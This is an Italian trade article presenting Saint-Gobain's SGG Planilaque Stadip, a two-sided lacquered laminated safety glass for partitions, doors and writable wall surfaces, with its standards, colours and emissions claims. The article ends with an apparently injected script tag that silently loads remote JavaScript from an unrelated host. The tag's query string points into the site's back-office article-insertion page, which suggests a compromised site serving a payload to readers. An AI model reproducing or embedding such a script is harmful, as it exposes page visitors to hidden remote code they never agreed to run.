Un vetro colorato e brillante, sicuro, elegante ma al tempo stesso pratico e in grado di diventare un elemento d’arredo funzionale come una lavagna a parete o del tutto personalizzabile con un po’ di estro creativo e un pennarello. È questa l’idea alla base dell’ultima innovazione di prodotto portata da Saint-Gobain nel mercato italiano.
Si chiama SGG Planilaque Stadip ed è un vetro stratificato di sicurezza laccato bifacciale pensato appositamente per gli interni di case ed uffici, che si adatta particolarmente bene all’impiego nell’arredamento, nei pannelli divisori, nelle partizioni e porte scorrevoli. La novità più importante risiede nel processo produttivo, che permette una lavorazione delle lastre di vetro che garantisce un’estetica della laccatura fino ad oggi irrealizzabile, ovvero bifacciale, visibile su entrambe le facce del prodotto.
Grazie a questa caratteristica, associata alle prestazioni di sicurezza, il vetro SGG Planilaque Stadip (classificato almeno 2B2 secondo la norma EN12600) è ideale per le pareti divisorie e le porte interne, oltre che per eventuali decorazioni interne. SGG Planilaque Stadip, grazie alla purezza dei colori, conferisce agli spazi interni una connotazione particolarmente elegante. Nelle colorazioni chiare, tutte le parti verticali inoltre sono delle superfici su cui poter scrivere.
Dettaglio tecnico e colorazioni
Prodotto secondo un processo industriale proprio di Saint-Gobain Glass, SGG Planilaque Stadip è composto da due vetri laccati il cui aspetto coprente e colorato è ottenuto mediante il deposito e la cottura di uno strato di lacca a elevata resistenza sulla faccia posteriore del vetro. I due vetri laccati sono in seguito assemblati mediante una pellicola di polivinilbutirrale (PVB). Lo spessore del prodotto è di 66,2 mm, mentre le colorazioni di base sono il verde mandorla bifacciale, l’ultra-bianco bifacciale, l’ultra-nero bifacciale. Altre composizioni, dimensioni e colori sono disponibili su richiesta.
Qualità dell’aria e pieno rispetto delle normative
All’interno, SGG Planilaque Stadip contribuisce al mantenimento di un ambiente sano e non inquinato, superando notevolmente le raccomandazioni proposte in materia di emanazioni di Formaldeide e di altri Composti Organici Volatili (COV). Il prodotto è inoltre conforme alle norme EN12543 e EN14449 ed è marcato CE.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.8980762635932636" type="text/javascript"></script>